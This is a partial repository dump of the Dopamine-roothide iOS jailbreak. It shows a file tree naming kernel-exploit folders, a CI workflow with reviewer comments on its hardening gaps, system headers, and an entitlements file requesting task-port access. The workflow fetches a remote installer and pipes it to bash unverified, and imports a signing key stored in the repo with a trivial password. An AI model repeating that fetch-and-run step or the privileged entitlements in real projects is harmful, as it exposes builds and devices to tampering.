├── .github └── workflows │ └── main.yml ├── .gitignore ├── .gitmodules ├── .vscode ├── launch.json └── settings.json ├── BaseBin ├── .gitignore ├── _external │ ├── fallback │ │ └── CydiaSubstrate.framework │ │ │ ├── .this_is_ellekit_not_substrate │ │ │ └── CydiaSubstrate │ ├── opainject │ └── tar ├── _shared │ ├── CoreServices │ │ ├── LSApplicationProxy.h │ │ └── LSBundleProxy.h │ ├── CoreSymbolication.h │ ├── FSEvents.h │ ├── bsm │ │ ├── audit.h │ │ ├── audit_filter.h │ │ ├── audit_session.h │ │ ├── audit_uevents.h │ │ └── libbsm.h │ ├── kern_memorystatus.h │ ├── launch.h │ ├── libarchive │ │ ├── archive.h │ │ └── archive_entry.h │ ├── libellekit.tbd │ ├── libproc.h │ ├── libproc_private.h │ ├── sandbox.h │ ├── substrate.h │ └── xpc │ │ ├── XPC.apinotes │ │ ├── activity.h │ │ ├── availability.h │ │ ├── base.h │ │ ├── connection.h │ │ ├── debug.h │ │ ├── endpoint.h │ │ ├── module.modulemap │ │ ├── private.h │ │ ├── rich_error.h │ │ ├── session.h │ │ └── xpc.h ├── boomerang │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ └── main.m ├── clean ├── clean.sh ├── forkfix │ ├── Makefile │ ├── src │ │ ├── litehook.c │ │ ├── litehook.h │ │ ├── main.c │ │ ├── syscall.S │ │ └── syscall.h │ └── upload.sh ├── idownloadd │ ├── Makefile │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── idownloadd.xcodeproj │ │ ├── project.pbxproj │ │ └── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ │ └── idownloadd │ │ ├── iDownloadCmds.swift │ │ ├── iDownloadKRW.swift │ │ ├── idownloadd-Bridging-Header.h │ │ └── main.swift ├── jailbreakd │ ├── Makefile │ ├── README.md │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── JBDTCPage.h │ │ ├── JBDTCPage.m │ │ ├── codesign.h │ │ ├── codesign.m │ │ ├── dyld_patch.h │ │ ├── dyld_patch.m │ │ ├── fakelib.h │ │ ├── fakelib.m │ │ ├── forkfix.h │ │ ├── forkfix.m │ │ ├── server.h │ │ ├── server.m │ │ ├── 
spawn_wrapper.h │ │ ├── spawn_wrapper.m │ │ ├── trustcache.h │ │ ├── trustcache.m │ │ ├── trustcache_structs.h │ │ ├── update.h │ │ └── update.m ├── jbctl │ ├── Makefile │ ├── entitlements.plist │ ├── rebuild_daemon.plist │ └── src │ │ └── main.m ├── jbinit │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ ├── launchctl.h │ │ ├── launchctl.m │ │ └── main.m ├── launchdhook │ ├── Makefile │ └── src │ │ ├── boomerang.h │ │ ├── boomerang.m │ │ ├── crashreporter.h │ │ ├── crashreporter.m │ │ ├── daemon_hook.h │ │ ├── daemon_hook.m │ │ ├── ipc_hook.h │ │ ├── ipc_hook.m │ │ ├── main.m │ │ ├── spawn_hook.h │ │ ├── spawn_hook.m │ │ ├── xpc_hook.h │ │ └── xpc_hook.m ├── libfilecom │ ├── Makefile │ └── src │ │ ├── FCHandler.h │ │ └── FCHandler.m ├── libintl.8.dylib ├── libjailbreak │ ├── Makefile │ └── src │ │ ├── RemoteLog.h │ │ ├── boot_info.h │ │ ├── boot_info.m │ │ ├── csblob.h │ │ ├── handoff.h │ │ ├── handoff.m │ │ ├── jailbreakd.h │ │ ├── jailbreakd.m │ │ ├── kcall.h │ │ ├── kcall.m │ │ ├── launchd.h │ │ ├── launchd.m │ │ ├── libjailbreak.h │ │ ├── log.c │ │ ├── log.h │ │ ├── macho.h │ │ ├── macho.m │ │ ├── pac.S │ │ ├── patchfind.h │ │ ├── patchfind.m │ │ ├── pplrw.h │ │ ├── pplrw.m │ │ ├── pte.h │ │ ├── recdhash.m │ │ ├── signatures.h │ │ ├── signatures.m │ │ ├── unrestrict.m │ │ ├── unsandbox.m │ │ ├── util.h │ │ ├── util.m │ │ └── vnode.h ├── pack.sh ├── roothidehooks │ ├── .gitignore │ ├── Makefile │ ├── cfprefsd.x │ ├── common.h │ ├── common.m │ ├── installd.x │ ├── lsd.x │ ├── main.x │ ├── pathhook.x │ └── sb.x ├── systemhook │ ├── Makefile │ ├── src │ │ ├── common.c │ │ ├── common.h │ │ ├── envbuf.c │ │ ├── envbuf.h │ │ ├── launchd.h │ │ └── main.c │ └── upload.sh ├── tar ├── upload.sh └── watchdoghook │ ├── Makefile │ └── src │ └── main.m ├── Dopamine ├── .gitignore ├── Dopamine.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── 
Package.resolved │ └── xcshareddata │ │ └── xcschemes │ │ └── Dopamine.xcscheme ├── Dopamine │ ├── Assets.xcassets │ │ ├── AccentColor.colorset │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset │ │ │ ├── 1024.png │ │ │ ├── Contents.json │ │ │ ├── icon-1024.png │ │ │ ├── icon-20-ipad.png │ │ │ ├── icon-20@2x-ipad.png │ │ │ ├── icon-20@2x.png │ │ │ ├── icon-20@3x.png │ │ │ ├── icon-29-ipad.png │ │ │ ├── icon-29.png │ │ │ ├── icon-29@2x-ipad.png │ │ │ ├── icon-29@2x.png │ │ │ ├── icon-29@3x.png │ │ │ ├── icon-40.png │ │ │ ├── icon-40@2x.png │ │ │ ├── icon-40@3x.png │ │ │ ├── icon-60@2x.png │ │ │ ├── icon-60@3x.png │ │ │ ├── icon-76.png │ │ │ ├── icon-76@2x.png │ │ │ └── icon-83.5@2x.png │ │ ├── Backgrounds │ │ │ ├── Clouds.imageset │ │ │ │ ├── Clouds@3x.jpg │ │ │ │ └── Contents.json │ │ │ ├── Contents.json │ │ │ └── Wallpaper.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── pexels-soubhagya-maharana-4124435.jpg │ │ ├── Contents.json │ │ ├── Easter Eggs │ │ │ ├── Contents.json │ │ │ └── fr.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── fr.png │ │ ├── Logos │ │ │ ├── Contents.json │ │ │ ├── DopamineLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── DopamineLogo2.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── FuguTransparent.imageset │ │ │ │ ├── Artboard copy 2.png │ │ │ │ ├── Artboard copy.png │ │ │ │ ├── Artboard.png │ │ │ │ └── Contents.json │ │ │ ├── PinautenLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy 2.png │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy.png │ │ │ │ └── Pinauten_Logo_SecResearch_4096.png │ │ │ ├── discord.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── discord-mark-white.png │ │ │ └── github.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── GitHub-Mark-64px.png │ │ ├── Package Managers │ │ │ ├── Contents.json │ │ │ ├── 
Sileo.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Sileo.png │ │ │ └── Zebra.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Zebra.png │ │ ├── Pinauten_Logo_SecResearch_1024.png │ │ ├── Pinauten_Logo_SecResearch_2048.png │ │ └── Pinauten_Logo_SecResearch_4096.png │ ├── Dopamine-Bridging-Header.h │ ├── Dopamine.entitlements │ ├── DopamineApp.swift │ ├── Info.plist │ ├── JailbreakView.swift │ ├── Preview Content │ │ └── Preview Assets.xcassets │ │ │ └── Contents.json │ ├── UI │ │ ├── Classes │ │ │ └── Logger.swift │ │ ├── Extensions │ │ │ ├── Error++.swift │ │ │ ├── TextField++.swift │ │ │ └── URLExtension+download.swift │ │ └── Views │ │ │ ├── AboutView.swift │ │ │ ├── Jailbreak.swift │ │ │ ├── JailbreakView.swift │ │ │ ├── LogView.swift │ │ │ ├── MaterialView.swift │ │ │ ├── PackageManagerSelectionView.swift │ │ │ ├── PopupView.swift │ │ │ ├── SettingsView.swift │ │ │ └── UpdateDownloadingView.swift │ ├── bootstrap │ │ ├── Dopamine.roothide │ │ ├── bootstrap-iphoneos-arm64.tar.zst │ │ ├── libjbdrw.deb │ │ ├── roothideapp.deb │ │ ├── sileo.deb │ │ └── zebra.deb │ ├── include │ │ ├── LSApplicationProxy.h │ │ ├── LSApplicationWorkspace.h │ │ ├── LSBundleProxy.h │ │ ├── _LSApplicationState.h │ │ └── posix_spawn.h │ └── main.swift ├── Makefile ├── ar.lproj │ └── Localizable.strings ├── da.lproj │ └── Localizable.strings ├── de.lproj │ └── Localizable.strings ├── el.lproj │ └── Localizable.strings ├── en.lproj │ └── Localizable.strings ├── fil.lproj │ └── Localizable.strings ├── fr.lproj │ └── Localizable.strings ├── it.lproj │ └── Localizable.strings ├── ja.lproj │ └── Localizable.strings ├── kk.lproj │ └── Localizable.strings ├── ko.lproj │ └── Localizable.strings ├── localization_keys.sh ├── nl.lproj │ └── Localizable.strings ├── pl.lproj │ └── Localizable.strings ├── pt-BR.lproj │ └── Localizable.strings ├── ru.lproj │ └── Localizable.strings ├── sort_localizations.sh ├── sv.lproj │ └── Localizable.strings ├── tr.lproj │ └── Localizable.strings ├── uk.lproj │ └── 
Localizable.strings ├── ur.lproj │ └── Localizable.strings ├── vi.lproj │ └── Localizable.strings ├── zh-Hans.lproj │ └── Localizable.strings ├── zh_CN.lproj │ └── Localizable.strings ├── zh_HK.lproj │ └── Localizable.strings └── zh_TW.lproj │ └── Localizable.strings ├── Exploits ├── fastPath │ ├── arm.pfx │ ├── ca.conf │ ├── clean.sh │ ├── genCrt.sh │ ├── itd.conf │ ├── usr_arm.conf │ ├── usr_x86_64.conf │ └── x86_64.pfx └── oobPCI │ ├── .gitignore │ ├── Makefile │ ├── Sources │ ├── DriverKit.c │ ├── DriverKit.h │ ├── DriverKitClasses.h │ ├── Fugu15KRW.h │ ├── asm.S │ ├── badRecovery.c │ ├── badRecovery.h │ ├── device.defs │ ├── generated │ │ ├── device.c │ │ ├── device.h │ │ ├── mach_host.c │ │ ├── mach_host.h │ │ ├── task.c │ │ ├── task.h │ │ ├── thread.c │ │ └── thread.h │ ├── includeme.h │ ├── kernel.c │ ├── kernel.h │ ├── kernrw_alloc.c │ ├── kernrw_alloc.h │ ├── mach.c │ ├── mach_host.defs │ ├── main.c │ ├── misc.c │ ├── offsets.c │ ├── offsets.h │ ├── oobPCI.c │ ├── oobPCI.h │ ├── physrw.c │ ├── physrw.h │ ├── print.c │ ├── sleep.c │ ├── sleep.h │ ├── task.defs │ ├── thread.defs │ ├── tlbFail.c │ ├── tlbFail.h │ ├── virtrw.c │ ├── virtrw.h │ └── xprr.h │ └── oobPCI.entitlements ├── LICENSE.md ├── LICENSE_Fugu15.md ├── LICENSE_libc.md ├── Makefile ├── Packages ├── Fugu15KernelExploit │ ├── .gitignore │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ └── Sources │ │ ├── CBindings │ │ ├── fcntl.m │ │ ├── include │ │ │ ├── CBindings.h │ │ │ ├── libjailbreak.h │ │ │ ├── posix_spawn.h │ │ │ ├── th_state.h │ │ │ ├── wifi.h │ │ │ ├── zdict.h │ │ │ ├── zstd.h │ │ │ └── zstd_errors.h │ │ ├── launch.h │ │ ├── libjailbreak.m │ │ ├── pci_offset.m │ │ ├── th_state.c │ │ ├── wifi.m │ │ ├── xpc │ │ │ ├── XPC.apinotes │ │ │ ├── activity.h │ │ │ ├── availability.h │ │ │ ├── base.h │ │ │ ├── connection.h │ │ │ ├── debug.h │ │ │ ├── endpoint.h │ │ │ ├── module.modulemap │ │ │ └── xpc.h │ │ └── zstd_wrapper.m │ │ └── Fugu15KernelExploit │ │ ├── Bootstrapper.swift │ │ 
├── Fugu15.swift │ │ ├── KRWHandler.swift │ │ ├── Logger.swift │ │ ├── SpawnDrv │ │ ├── SpawnDrv.swift │ │ └── tp.swift │ │ ├── Util.swift │ │ ├── codelessKext.swift │ │ └── oobPCI.swift ├── KernelPatchfinder │ ├── .gitignore │ ├── LICENSE │ ├── Package.swift │ ├── README.md │ ├── Sources │ │ ├── KernelPatchfinder │ │ │ └── KernelPatchfinder.swift │ │ └── KernelPatchfinderTester │ │ │ └── main.swift │ └── Tests │ │ └── KernelPatchfinderTests │ │ └── KernelPatchfinderTests.swift ├── PatchfinderUtils │ ├── .gitignore │ ├── LICENSE │ ├── Package.swift │ ├── README.md │ └── Sources │ │ ├── CFastFind │ │ ├── CFastFind.c │ │ └── include │ │ │ └── CFastFind.h │ │ └── PatchfinderUtils │ │ ├── AArch64Instr.swift │ │ ├── Kernel.swift │ │ ├── MachO.swift │ │ └── PatchfinderSegment.swift └── ProcessCommunication │ ├── .gitignore │ ├── Package.swift │ ├── README.md │ └── Sources │ └── ProcessCommunication │ └── ProcessCommunication.swift ├── README.dev.md ├── README.md ├── Tools ├── Exe2Driver │ ├── .gitignore │ ├── Exe2Driver │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ └── Sources │ │ └── Exe2Driver │ │ └── main.swift ├── Makefile ├── Makefile.inc ├── fastPathSign │ ├── .gitignore │ ├── Makefile │ ├── Package.swift │ ├── README.md │ ├── Sources │ │ ├── Security_Codesign │ │ │ ├── SecCodeSigner.h │ │ │ └── module.modulemap │ │ └── fastPathSign │ │ │ └── main.swift │ └── fastPathSign └── installHaxx │ ├── .gitignore │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ ├── Sources │ └── installHaxx │ │ └── main.swift │ └── installHaxx ├── banner.png └── jbupdate.sh /.github/workflows/main.yml: -------------------------------------------------------------------------------- 1 | name: "Dopamine: build and upload" 2 | 3 | on: 4 | push: 5 | branches: 6 | - master 7 | paths-ignore: 8 | - ".gitignore" 9 | pull_request: 10 | branches: 11 | - master 12 | paths-ignore: 13 | - ".gitignore" 14 | workflow_dispatch: 15 | schedule: 16 | - 
cron: '0 0 1 1 *'
17 |     - cron: '0 0 1 4 *'
18 |     - cron: '0 0 30 6 *'
19 |     - cron: '0 0 28 9 *'
20 |     - cron: '0 0 27 12 *'
21 |
22 | concurrency:
23 |   group: ${{ github.workflow }}-${{ github.ref }}
24 |   cancel-in-progress: true
25 |
   | # NOTE(review): no `permissions:` key appears anywhere in this workflow, so
   | # the job runs with the repository's default GITHUB_TOKEN scope. The steps
   | # shown only check out code and upload artifacts; `permissions: contents: read`
   | # would likely be enough - confirm against what procursus-action needs.
26 | jobs:
27 |   build:
28 |     runs-on: macos-latest
29 |     steps:
   |       # NOTE(review): version tags such as @v3 are mutable. Pinning every
   |       # `uses:` to a full commit SHA (e.g. actions/checkout@<full-commit-sha>)
   |       # means the code that runs here cannot change without a reviewed edit.
30 |       - name: Checkout
31 |         uses: actions/checkout@v3
32 |
   |       # NOTE(review): this third-party action is referenced by branch name.
   |       # Any commit pushed to that branch executes in this job on the next run,
   |       # before the build. Pin it to a reviewed commit SHA.
33 |       - name: Install Procursus
34 |         uses: dhinakg/procursus-action@main
35 |         with:
36 |           packages: ldid findutils sed coreutils trustcache make
37 |
   |       # Downloads the THEOS installer, patches it with gsed so that an empty
   |       # sdks directory is created before get_sdks is reached, then runs it.
   |       # NOTE(review): the installer is fetched from the moving `master` branch
   |       # and executed without an integrity check. Fetch a specific commit and
   |       # compare a recorded checksum before `bash install-theos.sh`. The `>>`
   |       # redirect appends; `-o install-theos.sh` would avoid concatenating onto
   |       # a file that already exists in the checkout.
38 |       - name: Install THEOS (without SDKs)
39 |         run: |
40 |           set -x
41 |           export BASEDIR="$(pwd)"
42 |           export THEOS="${BASEDIR}/theos"
43 |           mkdir -p $THEOS
44 |           curl -fsSL https://raw.githubusercontent.com/theos/theos/master/bin/install-theos >> install-theos.sh
45 |           gsed -E "/^\s*get_theos\s*$/,+1 s/^(\s*)(get_sdks)\s*$/\1mkdir -p \${THEOS}\/sdks\n\1touch \${THEOS}\/sdks\/sdk\n\1\2/g" -i install-theos.sh
46 |           bash install-theos.sh
47 |           cd $BASEDIR
48 |
   |       # Exports a build timestamp (ctime), its epoch form (ctimestamp) and the
   |       # short commit hash (shorthash) to later steps through $GITHUB_ENV.
49 |       - name: Set Environment Variables
50 |         run: |
51 |           set -x
52 |           T2=$(TZ=UTC-2 date +'%Y%m%d_%H%M%S')
53 |           TS=$(date -j -f "%Y%m%d_%H%M%S" "${T2}" +%s)
54 |           SHASH=$(git rev-parse --short HEAD)
55 |           echo "ctime=${T2}" >> $GITHUB_ENV
56 |           echo "ctimestamp=${TS}" >> $GITHUB_ENV
57 |           echo "shorthash=${SHASH}" >> $GITHUB_ENV
58 |
   |       # NOTE(review): the .pfx and its password are both stored in the
   |       # repository, so this signing identity is public and proves nothing about
   |       # who built an artifact. `-A` additionally lets every application on the
   |       # runner use the imported key without a prompt; on a non-ephemeral or
   |       # self-hosted runner prefer a throwaway keychain and `-T <tool-path>`.
   |       # NOTE(review): `${{ env.* }}` is expanded into the script text before
   |       # the shell runs. The values here come from `date` and `git rev-parse`,
   |       # but reading them as "$shorthash" / "$ctime" keeps data out of the
   |       # script body.
59 |       - name: Build
60 |         run: |
61 |           set -x
62 |           sudo security import Exploits/fastPath/arm.pfx -k /Library/Keychains/System.keychain -P password -A
63 |           export BASEDIR="$(pwd)"
64 |           export THEOS="${BASEDIR}/theos"
65 |           gmake -j$(sysctl -n hw.physicalcpu)
66 |           cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa
67 |           cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_Latest.tipa
68 |
   |       # NOTE(review): the uploaded .tipa is produced from unpinned inputs (see
   |       # the notes above). Publishing a checksum next to each artifact would let
   |       # consumers verify what they downloaded.
69 |       - name: Upload Latest Artifact
70 |         id: dopamine-latest-upload
71 |         uses: actions/upload-artifact@v3
72 |         with:
73 |           name: Dopamine_Latest
74 |           path: |
75 |             ${{ github.workspace }}/Dopamine/Dopamine_Latest.tipa
76 |       - name: Upload Hashed Artifact
77 |         id: dopamine-hashed-upload
78 |         uses:
actions/upload-artifact@v3 79 | with: 80 | name: Dopamine_${{ env.shorthash }}_${{ env.ctime }} 81 | path: | 82 | ${{ github.workspace }}/Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa 83 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/ 7 | /Package.resolved 8 | /Server/orig.ipa 9 | /Server/serverCert/fullchain.cer 10 | /Server/serverCert/server.key 11 | Dopamine/Dopamine/bootstrap/tmp/ 12 | .idea 13 | Tools/fastPathSign/.build_* 14 | BaseBin/upload.sh 15 | .vscode/settings.json 16 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "BaseBin/ChOma"] 2 | path = BaseBin/ChOma 3 | url = https://github.com/opa334/ChOma 4 | -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "files.associations": { 3 | "dyld.h": "c", 4 | "termios.h": "c", 5 | "_pid_t.h": "c", 6 | "_types.h": "c", 7 | "cdefs.h": "c", 8 | "util.h": "c", 9 | "filesystem": "c", 10 | "chrono": "c", 11 | "driverkit.h": "c", 12 | "mach.h": "c", 13 | "syslog.h": "c", 14 | "stdbool.h": "c", 15 | "device.h": "c", 16 | "includeme.h": "c", 17 | "paths.h": "c", 18 | "common.h": "c", 19 | "__config": "c", 20 | "_pthread_types.h": "c" 21 | } 22 | } -------------------------------------------------------------------------------- /BaseBin/.gitignore: -------------------------------------------------------------------------------- 1 | basebin.tc 2 | libjailbreak/libjailbreak.dylib 3 | jailbreakd/jailbreakd 4 | jbinit/jbinit 5 | jbctl/jbctl 6 | launchdhook/launchdhook.dylib 7 | forkfix/forkfix.dylib 8 | 
systemhook/systemhook.dylib 9 | watchdoghook/watchdoghook.dylib 10 | libfilecom/libfilecom.dylib 11 | boomerang/boomerang 12 | idownloadd/idownloadd 13 | idownloadd/.build.xcarchive 14 | _shared/libjailbreak 15 | _shared/libfilecom 16 | _shared/ChOma 17 | .tmp -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate -------------------------------------------------------------------------------- /BaseBin/_external/opainject: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/opainject -------------------------------------------------------------------------------- /BaseBin/_external/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/_external/tar -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSApplicationProxy.h: -------------------------------------------------------------------------------- 1 | #import "LSBundleProxy.h" 2 | @interface 
LSApplicationProxy : LSBundleProxy 3 | + (instancetype)applicationProxyForIdentifier:(NSString *)identifier; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSBundleProxy.h: -------------------------------------------------------------------------------- 1 | @interface LSBundleProxy : NSObject 2 | @property (nonatomic) NSURL *bundleURL; 3 | @property (nonatomic,readonly) NSString *bundleExecutable; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/libproc_private.h: -------------------------------------------------------------------------------- 1 | struct proc_bsdinfo { 2 | uint32_t pbi_flags; /* 64bit; emulated etc */ 3 | uint32_t pbi_status; 4 | uint32_t pbi_xstatus; 5 | uint32_t pbi_pid; 6 | uint32_t pbi_ppid; 7 | uid_t pbi_uid; 8 | gid_t pbi_gid; 9 | uid_t pbi_ruid; 10 | gid_t pbi_rgid; 11 | uid_t pbi_svuid; 12 | gid_t pbi_svgid; 13 | uint32_t rfu_1; /* reserved */ 14 | char pbi_comm[MAXCOMLEN]; 15 | char pbi_name[2 * MAXCOMLEN]; /* empty if no name is registered */ 16 | uint32_t pbi_nfiles; 17 | uint32_t pbi_pgid; 18 | uint32_t pbi_pjobc; 19 | uint32_t e_tdev; /* controlling tty dev */ 20 | uint32_t e_tpgid; /* tty process group id */ 21 | int32_t pbi_nice; 22 | uint64_t pbi_start_tvsec; 23 | uint64_t pbi_start_tvusec; 24 | }; 25 | 26 | #define PROC_PIDTBSDINFO 3 27 | #define PROC_PIDTBSDINFO_SIZE (sizeof(struct proc_bsdinfo)) -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/debug.h: 
-------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly. 18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 
16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/private.h: -------------------------------------------------------------------------------- 1 | void xpc_dictionary_get_audit_token(xpc_object_t xdict, audit_token_t *token); 2 | char *xpc_strerror (int); 3 | 4 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_pipe_create_from_port(mach_port_t port, uint32_t flags); 5 | extern int xpc_pipe_simpleroutine(xpc_object_t pipe, xpc_object_t message); 6 | extern int xpc_pipe_routine(xpc_object_t pipe, xpc_object_t message, XPC_GIVES_REFERENCE xpc_object_t *reply); 7 | extern int xpc_pipe_routine_with_flags(xpc_object_t xpc_pipe, xpc_object_t inDict, XPC_GIVES_REFERENCE xpc_object_t *reply, uint32_t flags); 8 | extern int xpc_pipe_routine_reply(xpc_object_t reply); 9 | extern int xpc_pipe_receive(mach_port_t port, XPC_GIVES_REFERENCE xpc_object_t *message); 10 | 11 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_copy_entitlement_for_token(const char *, audit_token_t *); -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/rich_error.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_RICH_ERROR_H__ 2 | #define __XPC_RICH_ERROR_H__ 3 | 4 | 
#ifndef __XPC_INDIRECT__ 5 | #error "Please #include instead of this file directly." 6 | // For HeaderDoc. 7 | #include 8 | #endif // __XPC_INDIRECT__ 9 | 10 | #ifndef __BLOCKS__ 11 | #error "XPC Rich Errors require Blocks support." 12 | #endif // __BLOCKS__ 13 | 14 | XPC_ASSUME_NONNULL_BEGIN 15 | __BEGIN_DECLS 16 | 17 | #pragma mark Properties 18 | /*! 19 | * @function xpc_rich_error_copy_description 20 | * Copy the string description of an error. 21 | * 22 | * @param error 23 | * The error to be examined. 24 | * 25 | * @result 26 | * The underlying C string for the provided error. This string should be 27 | * disposed of with free(3) when done. 28 | * 29 | * This will return NULL if a string description could not be generated. 30 | */ 31 | XPC_EXPORT XPC_WARN_RESULT 32 | char * _Nullable 33 | xpc_rich_error_copy_description(xpc_rich_error_t error); 34 | 35 | /*! 36 | * @function xpc_rich_error_can_retry 37 | * Whether the operation the error originated from can be retried. 38 | * 39 | * @param error 40 | * The error to be inspected. 41 | * 42 | * @result 43 | * Whether the operation the error originated from can be retried. 
44 | */ 45 | XPC_EXPORT XPC_WARN_RESULT 46 | bool 47 | xpc_rich_error_can_retry(xpc_rich_error_t error); 48 | 49 | __END_DECLS 50 | XPC_ASSUME_NONNULL_END 51 | 52 | #endif // __XPC_RICH_ERROR_H__ 53 | -------------------------------------------------------------------------------- /BaseBin/boomerang/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = boomerang 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -O2 6 | LDFLAGS = -L../libjailbreak -ljailbreak -L../libfilecom -lfilecom 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/boomerang/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | 8 | task_for_pid-allow 9 | 10 | com.apple.system-task-ports 11 | 12 | com.apple.system-task-ports.control 13 | 14 | 15 | com.apple.private.security.no-container 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/clean: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | PREV_DIR=$(pwd) 6 | PACK_DIR=$(dirname -- "$0") 7 | cd "$PACK_DIR" 8 | 9 | # libfilecom 10 | cd "libfilecom" 11 | make clean 12 | cd - 13 | 14 | # 